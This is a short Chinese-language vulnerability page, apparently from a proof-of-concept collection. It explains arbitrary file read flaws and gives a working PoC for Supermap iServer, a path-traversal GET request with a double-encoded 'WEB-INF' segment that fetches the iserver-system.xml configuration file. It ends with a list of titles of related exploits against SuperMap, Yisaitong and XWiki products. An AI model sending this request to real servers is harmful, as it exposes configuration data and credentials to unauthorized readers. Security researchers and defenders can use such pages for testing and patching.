漏洞描述
文件读取漏洞是指攻击者通过某种方式获取对系统文件的读取权限,从而访问敏感信息,如配置文件、源代码、用户数据等。这种漏洞通常是由于应用程序未正确实施权限控制或者未对用户输入进行充分过滤和验证导致的。
Supermap iServer 任意文件读取漏洞
PoC代码
GET /iserver/output/../WEB-IN%2546/iserver-system.xml HTTP/1.1相关漏洞推荐
- POC CVE-2020-24550: EpiServer Find <13.2.7 - Open Redirect
- POC CVE-2021-34805: FAUST iServer 9.0.018.018.4 - Local File Inclusion
- Supermap iServer /iserver/output/../WEB-IN%2546/iserver-system.xml 文件读取漏洞
- SuperMap-iServer /services 未授权访问漏洞
- SuperMap iServer /login.json 命令执行漏洞
- POC SuperMap-iServer login 远程命令执行漏洞
- Supermap iServer 存在文件读取漏洞
- POC 亿赛通电子文档安全管理系统 MultiServerAjax SQL注入漏洞
- 亿赛通电子文档安全管理系统 /CDGServer3/MultiServerAjax SSRF漏洞
- 亿赛通电子文档管理系统 MultiServerAjax SQL注入漏洞
- FAUST iServer 9.0.018.018.4目录遍历(CVE-2021-34805)
- XWiki.org XWiki XWikiServerClassSheet.xml 代码注入漏洞